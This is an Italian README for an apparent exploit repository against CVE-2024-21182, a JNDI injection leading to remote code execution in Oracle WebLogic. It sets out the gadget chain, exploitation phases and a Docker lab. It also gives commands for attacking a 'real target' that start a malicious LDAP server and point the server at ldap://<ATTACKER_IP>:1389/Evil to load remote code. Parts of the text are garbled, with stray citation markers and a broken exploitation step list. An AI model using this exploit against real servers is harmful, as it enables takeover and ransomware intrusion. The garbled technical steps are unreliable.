
Exploit proof-of-concept per CVE-2024-21182, un'iniezione JNDI non autenticata che porta all'esecuzione di codice remoto in Oracle WebLogic Server tramite i protocolli T3/IIOP. Include un laboratorio Docker per i test.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 è una vulnerabilità di iniezione JNDI non autenticata che colpisce il componente Core di Oracle WebLogic Server. Consente a un attaccante remoto, tramite i protocolli T3 o IIOP, di eseguire codice arbitrario (RCE) sul server, potendo ottenere accesso completo a tutti i dati del server[citation:5][citation:8][citation:9].
Questo repository contiene un Proof of Concept (PoC) funzionante che dimostra lo sfruttamento riuscito della patch di CVE-2023-21839 mediante la catena di gadget AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].
| Attributo | Valore |
|---|---|
| CVE | CVE-2024-21182 |
| Prodotto | Oracle WebLogic Server (Core) |
| Versioni interessate | 12.2.1.4.0 e 14.1.1.0.0[citation:7] |
| Patch disponibile | Oracle Critical Patch Update (Luglio 2024 e Ottobre 2024)[citation:6] |
| Stato in CISA KEV | Sfruttamento attivo confermato (aggiunta il 01/06/2026)[citation:3][citation:8] |
| Data limite di mitigazione (CISA) | 04/06/2026[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Fase 1: Riconoscimento: Identificare server WebLogic con le porte T3/IIOP (7001) esposte.
Fase 2: Analisi: Determinare se il server esegue una versione vulnerabile (12.2.1.4.0 o 14.1.1.0.0) o manca della patch di Ottobre 2024.
Fase 3: Sfruttamento (flusso tecnico):
AggregatableOpaqueReference[citation:2].referent dell'oggetto precedente in modo che punti a un MessageDestinationReference malevolo[citation:4].wlthint3client.jar (può essere estratto da un'installazione di WebLogic).# 1. Clonare il repository
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Avviare il laboratorio (vittima + attaccante)
docker-compose up -d
# 3. Eseguire lo sfruttamento automatico
./validate.sh
Sfruttamento contro un obiettivo reale (autorizzato)
# 1. Avviare il server LDAP/HTTP malevolo
python3 exploit/ldap_server.py
# 2. In un altro terminale, eseguire il payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
Stato attuale secondo CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Ma tipicamente sì, le RCE nei middleware sono vettori iniziali nelle intrusioni ransomware).
Questo codice è esclusivamente a scopo educativo e di ricerca. L'uso improprio di questo PoC contro sistemi senza autorizzazione espressa è illegale. L'autore non si assume responsabilità per l'uso improprio di queste informazioni.